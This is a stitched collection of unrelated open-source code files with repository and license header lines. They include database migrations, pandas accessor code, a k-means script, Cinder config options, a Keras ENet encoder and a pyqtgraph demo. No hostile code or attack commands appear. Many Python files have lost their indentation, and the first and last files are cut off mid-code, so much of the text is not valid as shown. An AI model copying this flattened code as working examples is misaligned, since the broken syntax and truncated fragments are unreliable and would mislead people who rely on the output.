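    # ready to be compared and written to /etc/sensu/conf.d/client.json below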
# Load the current config, if there is one, so we can compare
current_config = None
try:
current_config = json.load(open(path, 'r'))
except (IOError, ValueError):
# File either doesn't exist or it's invalid JSON
pass
if current_config is not None and current_config == config:
        # Config is the same, let's not change anything
carabri/carabri | test_script/open_gallery.py | Python | apache-2.0 | 123 | 0
import subprocess
subprocess.call("""
adb -d shell am start -n com.android.gallery/com.android.camera.GalleryPicker
""")
kylef/lithium | lithium/wiki/migrations/0001_initial.py | Python | bsd-2-clause | 7,245 | 0.008144
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Page'
db.create_table('wiki_page', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('parent', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='children', null=True, to=orm['wiki.Page'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
('permission', self.gf('django.db.models.fields.IntegerField')(default=0)),
))
db.send_create_signal('wiki', ['Page'])
# Adding model 'Revision'
db.create_table('wiki_revision', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['wiki.Page'])),
('text', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['wiki.Text'], null=True, blank=True)),
('comment', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('pub_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('author', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('author_ip', self.gf('django.db.models.fields.IPAddressField')(max_length=15, null=True, blank=True)),
))
db.send_create_signal('wiki', ['Revision'])
# Adding model 'Text'
db.create_table('wiki_text', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal('wiki', ['Text'])
def backwards(self, orm):
# Deleting model 'Page'
db.delete_table('wiki_page')
# Deleting model 'Revision'
db.delete_table('wiki_revision')
# Deleting model 'Text'
db.delete_table('wiki_text')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'wiki.page': {
'Meta': {'object_name': 'Page'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['wiki.Page']"}),
'permission': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
'wiki.revision': {
'Meta': {'ordering': "('-pub_date',)", 'object_name': 'Revision'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'author_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Page']"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'text': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Text']", 'null': 'True', 'blank': 'True'})
},
'wiki.text': {
'Meta': {'object_name': 'Text'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['wiki']
|
noironetworks/neutron
|
neutron/db/migration/alembic_migrations/versions/liberty/expand/45f955889773_quota_usage.py
|
Python
|
apache-2.0
| 1,496
| 0
|
# Copyright 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from alembic import op
import sqlalchemy as sa
from sqlalchemy import sql
"""quota_usage
Revision ID: 45f955889773
Revises: 8675309a5c4f
Create Date: 2015-04-17 08:09:37.611546
"""
# revision identifiers, used by Alembic.
revision = '45f955889773'
down_revision = '8675309a5c4f'
def upgrade():
op.create_table(
'quotausages',
sa.Column('tenant_id', sa.String(length=255),
nullable=False, primary_key=True, index=True),
sa.Column('resource', sa.String(length=255),
nullable=False, primary_key=True, index=True),
sa.Column('dirty', sa.Boolean(), nullable=False,
server_default=sql.false()),
sa.Column('in_use', sa.Integer(), nullable=False,
server_default='0'),
sa.Column('reserved', sa.Integer(), nullable=False,
server_default='0'))
|
kickstandproject/ripcord
|
ripcord/db/sqlalchemy/migrate_repo/versions/006_add_quota_support.py
|
Python
|
apache-2.0
| 2,465
| 0
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2013 PolyBeacon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import UniqueConstraint
from ripcord.openstack.common import log as logging
LOG = logging.getLogger(__name__)
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
quota = Table(
'quotas', meta,
Column('id', Integer, primary_key=True, autoincrement=True),
Column('created_at', DateTime),
        Column('hard_limit', Integer),
Column('project_id', String(length=255)),
Column('resource', String(length=255), nullable=False),
Column('updated_at', DateTime),
UniqueConstraint(
'project_id', 'resource',
name='uniq_quotas0project_id0resource'),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
quota_class = Table(
'quota_classes', meta,
        Column('id', Integer, primary_key=True, autoincrement=True),
Column('class_name', String(length=255)),
Column('created_at', DateTime),
Column('hard_limit', Integer),
Column('resource', String(length=255)),
Column('updated_at', DateTime),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
tables = [quota, quota_class]
for table in tables:
try:
table.create()
except Exception as e:
LOG.exception(e)
meta.drop_all(tables=tables)
raise
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
quota = Table('quotas', meta, autoload=True)
quota_class = Table('quota_classes', meta, autoload=True)
tables = [quota, quota_class]
for table in tables:
table.drop()
|
SitiBanc/1061_NCTU_IOMDS
|
1018/Course Material/1018_2.py
|
Python
|
apache-2.0
| 2,416
| 0.003714
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 18 20:53:35 2017
@author: sitibanc
"""
import numpy as np
import random
from sklearn import datasets
from scipy import stats
def kmeans(sample, K, max_iter):
    N = sample.shape[0]     # N samples
    D = sample.shape[1]     # each sample has D features
    C = np.zeros((K, D))    # K cluster centers
    L = np.zeros((N, 1))    # label (which cluster each sample belongs to)
    L1 = np.zeros((N, 1))   # labels recomputed after reassignment
    dist = np.zeros((N, K))
    # Randomly select the initial centers
idx = random.sample(range(N), K)
C = sample[idx, :]
iteration = 0
while iteration <= max_iter:
for i in range(K):
            # Compute squared distances to the center C[i] with whole-matrix operations
            # np.tile() --> repeat C[i, :] vertically N times, horizontally once
            dist[:, i] = np.sum((sample - np.tile(C[i, :], (N, 1))) ** 2 , 1)
        # Label each sample with its nearest center
        L1 = np.argmin(dist, 1)
        # If no sample changes cluster after reassignment, the clustering is stable: leave the loop
if iteration > 0 and np.array_equal(L, L1):
break
# Update Label L
L = L1
        # Recompute each cluster center after reassignment
        for i in range(K):
            # Indices of the samples belonging to cluster i
            idx = np.nonzero(L == i)[0]     # np.nonzero() picks out the True entries
            if len(idx) > 0:
                C[i, :] = np.mean(sample[idx, :], 0)    # mean along the vertical axis (0)
        iteration += 1
    # Calculate wicd (within-cluster distance: the distance of every sample to its cluster center)
wicd = np.sum(np.sqrt(np.sum((sample - C[L, :]) ** 2 , 1)))
    return C, L, wicd
# Practice 3 : Iris Dataset Clustering Using K-Means
data = datasets.load_iris()
feature = data.data
center, label, wicd = kmeans(feature, 3, 1000)
# Calculate Error Rate
error = 0
for i in range(len(label)):
if i < 50:
mode = stats.mode(label[:50])
if label[i] != mode[0][0]:
error += 1
elif i < 100:
        mode = stats.mode(label[50:100])
if label[i] != mode[0][0]:
error += 1
else:
mode = stats.mode(label[100:])
if label[i] != mode[0][0]:
error += 1
print('Error rate :', error / len(label))
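# For comparison, a minimal sketch using scikit-learn's built-in KMeans
# (illustrative only; `n_clusters=3` mirrors the kmeans() call above).
# Note that `inertia_` is the sum of *squared* distances, the squared
# analogue of wicd.
from sklearn.cluster import KMeans
km = KMeans(n_clusters=3, n_init=10, max_iter=1000).fit(feature)
print('sklearn centers:', km.cluster_centers_)  # compare with `center`
print('sklearn inertia:', km.inertia_)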
|
Intelworks/OpenTAXII
|
opentaxii/exceptions.py
|
Python
|
bsd-3-clause
| 157
| 0
|
from .taxii.exceptions import UnauthorizedStatus
class UnauthorizedException(UnauthorizedStatus):
pass
class InvalidAuthHeader(Exception):
pass
|
Ouranosinc/Magpie
|
magpie/api/__init__.py
|
Python
|
apache-2.0
| 329
| 0
|
from magpie.utils import get_logger
LOGGER = get_logger(__name__)
def includeme(config):
LOGGER.info("Adding API routes...")
# Add all the admin ui routes
config.include("magp
|
ie.api.home")
config.include("magpie.api.login")
config.include("magpie.api.management")
config.include("mag
|
pie.api.swagger")
|
syncloud/platform
|
src/syncloud_platform/rest/model/user.py
|
Python
|
gpl-3.0
| 67
| 0
|
class User:
    def __init__(self, name):
        self.name = name
|
dsm054/pandas
|
pandas/core/indexes/accessors.py
|
Python
|
bsd-3-clause
| 14,627
| 0.001641
|
"""
datetimelike delegation
"""
from __future__ import annotations
from typing import TYPE_CHECKING
import warnings
import numpy as np
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_integer_dtype,
is_list_like,
is_period_dtype,
is_timedelta64_dtype,
)
from pandas.core.dtypes.generic import ABCSeries
from pandas.core.accessor import (
PandasDelegate,
delegate_names,
)
from pandas.core.arrays import (
DatetimeArray,
PeriodArray,
TimedeltaArray,
)
from pandas.core.base import (
NoNewAttributesMixin,
PandasObject,
)
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
if TYPE_CHECKING:
from pandas import Series
class Properties(PandasDelegate, PandasObject, NoNewAttributesMixin):
_hidden_attrs = PandasObject._hidden_attrs | {
"orig",
"name",
}
def __init__(self, data: Series, orig):
if not isinstance(data, ABCSeries):
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
self._parent = data
self.orig = orig
self.name = getattr(data, "name", None)
self._freeze()
def _get_values(self):
data = self._parent
if is_datetime64_dtype(data.dtype):
return DatetimeIndex(data, copy=False, name=self.name)
elif is_datetime64tz_dtype(data.dtype):
return DatetimeIndex(data, copy=False, name=self.name)
elif is_timedelta64_dtype(data.dtype):
return TimedeltaIndex(data, copy=False, name=self.name)
elif is_period_dtype(data.dtype):
return PeriodArray(data, copy=False)
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
def _delegate_property_get(self, name):
from pandas import Series
values = self._get_values()
result = getattr(values, name)
# maybe need to upcast (ints)
if isinstance(result, np.ndarray):
if is_integer_dtype(result):
result = result.astype("int64")
elif not is_list_like(result):
return result
result = np.asarray(result)
if self.orig is not None:
index = self.orig.index
else:
index = self._parent.index
# return the result as a Series, which is by definition a copy
result = Series(result, index=index, name=self.name).__finalize__(self._parent)
# setting this object will show a SettingWithCopyWarning/Error
result._is_copy = (
"modifications to a property of a datetimelike "
"object are not supported and are discarded. "
"Change values on the original."
)
return result
def _delegate_property_set(self, name, value, *args, **kwargs):
raise ValueError(
"modifications to a property of a datetimelike object are not supported. "
"Change values on the original."
)
def _delegate_method(self, name, *args, **kwargs):
from pandas import Series
values = self._get_values()
method = getattr(values, name)
result = method(*args, **kwargs)
if not is_list_like(result):
return result
result = Series(result, index=self._parent.index, name=self.name).__finalize__(
self._parent
)
# setting this object will show a SettingWithCopyWarning/Error
result._is_copy = (
"modifications to a method of a datetimelike "
"object are not supported and are discarded. "
"Change values on the original."
)
return result
@delegate_names(
delegate=DatetimeArray, accessors=DatetimeArray._datetimelike_ops, typ="property"
)
@delegate_names(
delegate=DatetimeArray, accessors=DatetimeArray._datetimelike_methods, typ="method"
)
class DatetimeProperties(Properties):
"""
Accessor object for datetimelike properties of the Series values.
Examples
--------
>>> seconds_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="s"))
>>> seconds_series
0 2000-01-01 00:00:00
1 2000-01-01 00:00:01
2 2000-01-01 00:00:02
dtype: datetime64[ns]
>>> seconds_series.dt.second
0 0
1 1
2 2
dtype: int64
>>> hours_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="h"))
>>> hours_series
0 2000-01-01 00:00:00
1 2000-01-01 01:00:00
2 2000-01-01 02:00:00
dtype: datetime64[ns]
>>> hours_series.dt.hour
0 0
1 1
2 2
dtype: int64
>>> quarters_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="q"))
>>> quarters_series
0 2000-03-31
1 2000-06-30
2 2000-09-30
dtype: datetime64[ns]
>>> quarters_series.dt.quarter
0 1
1 2
2 3
dtype: int64
Returns a Series indexed like the original Series.
Raises TypeError if the Series does not contain datetimelike values.
"""
def to_pydatetime(self) -> np.ndarray:
"""
Return the data as an array of native Python datetime objects.
Timezone information is retained if present.
.. warning::
Python's datetime uses microsecond resolution, which is lower than
pandas (nanosecond). The values are truncated.
Returns
-------
numpy.ndarray
Object dtype array containing native Python datetime objects.
See Also
--------
datetime.datetime : Standard library value for a datetime.
Examples
--------
>>> s = pd.Series(pd.date_range('20180310', periods=2))
>>> s
0 2018-03-10
1 2018-03-11
dtype: datetime64[ns]
>>> s.dt.to_pydatetime()
array([datetime.datetime(2018, 3, 10, 0, 0),
datetime.datetime(2018, 3, 11, 0, 0)], dtype=object)
pandas' nanosecond precision is truncated to microseconds.
>>> s = pd.Series(pd.date_range('20180310', periods=2, freq='ns'))
        >>> s
0 2018-03-10 00:00:00.000000000
1 2018-03-10 00:00:00.000000001
dtype: datetime64[ns]
>>> s.dt.to_pydatetime()
array([datetime.datetime(2018, 3, 10, 0, 0),
datetime.datetime(2018, 3, 10, 0, 0)], dtype=object)
"""
return self._get_values().to_pydatetime()
@property
def freq(self):
        return self._get_values().inferred_freq
def isocalendar(self):
"""
Returns a DataFrame with the year, week, and day calculated according to
the ISO 8601 standard.
.. versionadded:: 1.1.0
Returns
-------
DataFrame
with columns year, week and day
See Also
--------
Timestamp.isocalendar : Function return a 3-tuple containing ISO year,
week number, and weekday for the given Timestamp object.
datetime.date.isocalendar : Return a named tuple object with
three components: year, week and weekday.
Examples
--------
>>> ser = pd.to_datetime(pd.Series(["2010-01-01", pd.NaT]))
>>> ser.dt.isocalendar()
year week day
0 2009 53 5
1 <NA> <NA> <NA>
>>> ser.dt.isocalendar().week
0 53
1 <NA>
Name: week, dtype: UInt32
"""
return self._get_values().isocalendar().set_index(self._parent.index)
@property
def weekofyear(self):
"""
The week ordinal of the year.
.. deprecated:: 1.1.0
Series.dt.weekofyear and Series.dt.week have been deprecated.
Please use Series.dt.isocalendar().week instead.
"""
warnings.warn(
"Series.dt.weekofyear and Series.dt.week have been deprecated. "
"Please use Series.dt.isocalendar().week instead.",
FutureWarning,
|
PavlosMelissinos/enet-keras
|
src/models/enet_unpooling/encoder.py
|
Python
|
mit
| 4,098
| 0.00366
|
# coding=utf-8
from keras.layers.advanced_activations import PReLU
from keras.layers.convolutional import Conv2D, ZeroPadding2D
from keras.layers.core import SpatialDropout2D, Permute
from keras.layers.merge import add, concatenate
from keras.layers.normalization import BatchNormalization
from ..layers.pooling import MaxPoolingWithArgmax2D
def initial_block(inp, nb_filter=13, nb_row=3, nb_col=3, strides=(2, 2)):
conv = Conv2D(nb_filter, (nb_row, nb_col), padding='same', strides=strides)(inp)
max_pool, indices = MaxPoolingWithArgmax2D()(inp)
merged = concatenate([conv, max_pool], axis=3)
return merged, indices
def bottleneck(inp, output, internal_scale=4, asymmetric=0, dilated=0, downsample=False, dropout_rate=0.1):
# main branch
internal = output // internal_scale
encoder = inp
# 1x1
input_stride = 2 if downsample else 1 # the 1st 1x1 projection is replaced with a 2x2 convolution when downsampling
encoder = Conv2D(internal, (input_stride, input_stride),
# padding='same',
strides=(input_stride, input_stride), use_bias=False)(encoder)
# Batch normalization + PReLU
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = PReLU(shared_axes=[1, 2])(encoder)
# conv
if not asymmetric and not dilated:
encoder = Conv2D(internal, (3, 3), padding='same')(encoder)
elif asymmetric:
encoder = Conv2D(internal, (1, asymmetric), padding='same', use_bias=False)(encoder)
encoder = Conv2D(internal, (asymmetric, 1), padding='same')(encoder)
elif dilated:
encoder = Conv2D(internal, (3, 3), dilation_rate=(dilated, dilated), padding='same')(encoder)
else:
raise(Exception('You shouldn\'t be here'))
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = PReLU(shared_axes=[1, 2])(encoder)
# 1x1
encoder = Conv2D(output, (1, 1), use_bias=False)(encoder)
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = SpatialDropout2D(dropout_rate)(encoder)
other = inp
# other branch
if downsample:
other, indices = MaxPoolingWithArgmax2D()(other)
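        # Descriptive note: the Permute/ZeroPadding2D pair below zero-pads the
        # channel axis up to `output` feature maps. Permute swaps channels into
        # a spatial position (ZeroPadding2D can only pad spatial axes), the
        # padding is applied, and the second Permute swaps the axes back.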
other = Permute((1, 3, 2))(other)
pad_feature_maps = output - inp.get_shape().as_list()[3]
tb_pad = (0, 0)
lr_pad = (0, pad_feature_maps)
other = ZeroPadding2D(padding=(tb_pad, lr_pad))(other)
other = Permute((1, 3, 2))(other)
encoder = add([encoder, other])
encoder = PReLU(shared_axes=[1, 2])(encoder)
if downsample:
return encoder, indices
else:
return encoder
def build(inp, dropout_rate=0.01):
pooling_indices = []
enet, indices_single = initial_block(inp)
enet = BatchNormalization(momentum=0.1)(enet) # enet_unpooling uses momentum of 0.1, keras default is 0.99
enet = PReLU(shared_axes=[1, 2])(enet)
pooling_indices.append(indices_single)
enet, indices_single = bottleneck(enet, 64, downsample=True, dropout_rate=dropout_rate) # bottleneck 1.0
pooling_indices.append(indices_single)
for _ in range(4):
enet = bottleneck(enet, 64, dropout_rate=dropout_rate) # bottleneck 1.i
enet, indices_single = bottleneck(enet, 128, downsample=True) # bottleneck 2.0
pooling_indices.append(indices_single)
    # bottleneck 2.x and 3.x
for _ in range(2):
enet = bottleneck(enet, 128) # bottleneck 2.1
enet = bottleneck(enet, 128, dilated=2) # bottleneck 2.2
enet = bottleneck(enet, 128, asymmetric=5) # bottleneck 2.3
enet = bottleneck(enet, 128, dilated=4) # bottleneck 2.4
enet = bottleneck(enet, 128) # bottleneck 2.5
        enet = bottleneck(enet, 128, dilated=8)  # bottleneck 2.6
enet = bottleneck(enet, 128, asymmetric=5) # bottleneck 2.7
enet = bottleneck(enet, 128, dilated=16) # bottleneck 2.8
return enet, pooling_indices
|
saeki-masaki/cinder
|
cinder/common/config.py
|
Python
|
apache-2.0
| 9,037
| 0
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 NTT corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Command-line flag library.
Emulates gflags by wrapping cfg.ConfigOpts.
The idea is to move fully to cfg eventually, and this wrapper is a
stepping stone.
"""
import socket
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import netutils
from cinder.i18n import _
CONF = cfg.CONF
logging.register_options(CONF)
core_opts = [
cfg.StrOpt('api_paste_config',
default="api-paste.ini",
help='File name for the paste.deploy config for cinder-api'),
cfg.StrOpt('state_path',
default='/var/lib/cinder',
deprecated_name='pybasedir',
help="Top-level directory for maintaining cinder's state"), ]
debug_opts = [
]
CONF.register_cli_opts(core_opts)
CONF.register_cli_opts(debug_opts)
global_opts = [
cfg.StrOpt('my_ip',
default=netutils.get_my_ipv4(),
help='IP address of this host'),
cfg.StrOpt('glance_host',
default='$my_ip',
help='Default glance host name or IP'),
cfg.IntOpt('glance_port',
default=9292,
help='Default glance port'),
cfg.ListOpt('glance_api_servers',
default=['$glance_host:$glance_port'],
help='A list of the glance API servers available to cinder '
'([hostname|ip]:port)'),
cfg.IntOpt('glance_api_version',
default=1,
help='Version of the glance API to use'),
cfg.IntOpt('glance_num_retries',
default=0,
help='Number retries when downloading an image from glance'),
cfg.BoolOpt('glance_api_insecure',
default=False,
help='Allow to perform insecure SSL (https) requests to '
'glance'),
cfg.BoolOpt('glance_api_ssl_compression',
default=False,
help='Enables or disables negotiation of SSL layer '
'compression. In some cases disabling compression '
'can improve data throughput, such as when high '
'network bandwidth is available and you use '
'compressed image formats like qcow2.'),
cfg.StrOpt('glance_ca_certificates_file',
help='Location of ca certificates file to use for glance '
'client requests.'),
cfg.IntOpt('glance_request_timeout',
default=None,
help='http/https timeout value for glance operations. If no '
'value (None) is supplied here, the glanceclient default '
'value is used.'),
cfg.StrOpt('scheduler_topic',
default='cinder-scheduler',
help='The topic that scheduler nodes listen on'),
cfg.StrOpt('volume_topic',
default='cinder-volume',
help='The topic that volume nodes listen on'),
cfg.StrOpt('backup_topic',
default='cinder-backup',
help='The topic that volume backup nodes listen on'),
cfg.BoolOpt('enable_v1_api',
default=True,
help=_("DEPRECATED: Deploy v1 of the Cinder API.")),
cfg.BoolOpt('enable_v2_api',
default=True,
help=_("Deploy v2 of the Cinder API.")),
cfg.BoolOpt('api_rate_limit',
default=True,
help='Enables or disables rate limit of the API.'),
cfg.ListOpt('osapi_volume_ext_list',
default=[],
help='Specify list of extensions to load when using osapi_'
'volume_extension option with cinder.api.contrib.'
'select_extensions'),
cfg.MultiStrOpt('osapi_volume_extension',
default=['cinder.api.contrib.standard_extensions'],
help='osapi volume extension to load'),
cfg.StrOpt('volume_manager',
default='cinder.volume.manager.VolumeManager',
help='Full class name for the Manager for volume'),
cfg.StrOpt('backup_manager',
default='cinder.backup.manager.BackupManager',
help='Full class name for the Manager for volume backup'),
cfg.StrOpt('scheduler_manager',
default='cinder.scheduler.manager.SchedulerManager',
help='Full class name for the Manager for scheduler'),
cfg.StrOpt('host',
default=socket.gethostname(),
help='Name of this node. This can be an opaque identifier. '
'It is not necessarily a host name, FQDN, or IP address.'),
# NOTE(vish): default to nova for compatibility with nova installs
cfg.StrOpt('storage_availability_zone',
default='nova',
help='Availability zone of this node'),
cfg.StrOpt('default_availability_zone',
default=None,
help='Default availability zone for new volumes. If not set, '
'the storage_availability_zone option value is used as '
'the default for new volumes.'),
cfg.StrOpt('default_volume_type',
default=None,
help='Default volume type to use'),
cfg.StrOpt('volume_usage_audit_period',
default='month',
help='Time period for which to generate volume usages. '
'The options are hour, day, month, or year.'),
cfg.StrOpt('rootwrap_config',
default='/etc/cinder/rootwrap.conf',
help='Path to the rootwrap configuration file to use for '
'running commands as root'),
cfg.BoolOpt('monkey_patch',
default=False,
help='Enable monkey patching'),
cfg.ListOpt('monkey_patch_modules',
default=[],
                help='List of modules/decorators to monkey patch'),
cfg.IntOpt('service_down_time',
default=60,
help='Maximum time since last check-in for a service to be '
'considered up'),
cfg.StrOpt('volume_api_class',
default='cinder.volume.api.API',
               help='The full class name of the volume API class to use'),
cfg.StrOpt('backup_api_class',
default='cinder.backup.api.API',
help='The full class name of the volume backup API class'),
cfg.StrOpt('auth_strategy',
default='keystone',
choices=['noauth', 'keystone', 'deprecated'],
help='The strategy to use for auth. Supports noauth, keystone, '
'and deprecated.'),
cfg.ListOpt('enabled_backends',
default=None,
help='A list of backend names to use. These backend names '
'should be backed by a unique [CONFIG] group '
'with its options'),
cfg.BoolOpt('no_snapshot_gb_quota',
default=False,
help='Whether snapshots count against gigabyte quota'),
cfg.StrOpt('transfer_api_class',
default='cinder.transfer.api.API',
help='The full class name of the volume transfer API class'),
cfg.StrOpt('replication_api_class',
default='cinder.replication.api.API',
help='The full class name of the volume replication API class'),
cfg.StrOpt('consistenc
|
robertsj/poropy
|
pyqtgraph/dockarea/__main__.py
|
Python
|
mit
| 1,587
| 0.018904
|
import os
import sys
## Make sure pyqtgraph is importable
p = os.path.dirname(os.path.abspath(__file__))
p = os.path.join(p, '..', '..')
sys.path.insert(0, p)
from pyqtgraph.Qt import QtCore, QtGui
from DockArea import *
from Dock import *
app = QtGui.QApplication([])
win = QtGui.QMainWindow()
area = DockArea()
win.setCentralWidget(area)
win.resize(800,800)
from Dock import Dock
d1 = Dock("Dock1", size=(200,200))
d2 = Dock("Dock2", size=(100,100))
d3 = Dock("Dock3", size=(1,1))
d4 = Dock("Dock4", size=(50,50))
d5 = Dock("Dock5", size=(100,100))
d6 = Dock("Dock6", size=(300,300))
area.addDock(d1, 'left')
area.addDock(d2, 'right')
area.addDock(d3, 'bottom')
area.addDock(d4, 'right')
area.addDock(d5, 'left', d1)
area.addDock(d6, 'top', d4)
area.moveDock(d6, 'above', d4)
d3.hideTitleBar()
print "===build complete===="
for d in [d1, d2, d3, d4, d5]:
w = QtGui.QWidget()
l = QtGui.QVBoxLayout()
w.setLayout(l)
btns = []
for i in range(4):
btns.append(QtGui.QPushButton("%s Button %d"%(d.name(), i)))
l.addWidget(btns[-1])
d.w = (w, l, btns)
d.addWidget(w)
import pyqtgraph as pg
p = pg.PlotWidget()
d6.addWidget(p)
print "===widgets added==="
#s = area.saveState()
#print "\n\n-------restore----------\n\n"
#area.restoreState(s)
s = None
def save():
global s
s = area.saveState()
def load():
global s
area.restoreState(s)
#d6.container().setCurrentIndex(0)
#d2.label.setTabPos(40)
#win2 = QtGui.QMainWindow()
#area2 = DockArea()
#win2.setCentralWidget(area2)
#win2.resize(800,800)
win.show()
#win2.show()
|
7senses/shaka
|
shaka.py
|
Python
|
gpl-2.0
| 15,841
| 0.003283
|
import socket
import json
import sys, traceback
import redis
class http_parser:
def __init__(self, sfhttp, is_client = True):
self.__METHOD = 0
self.__RESP = 1
self.__HEADER = 2
self.__BODY = 3
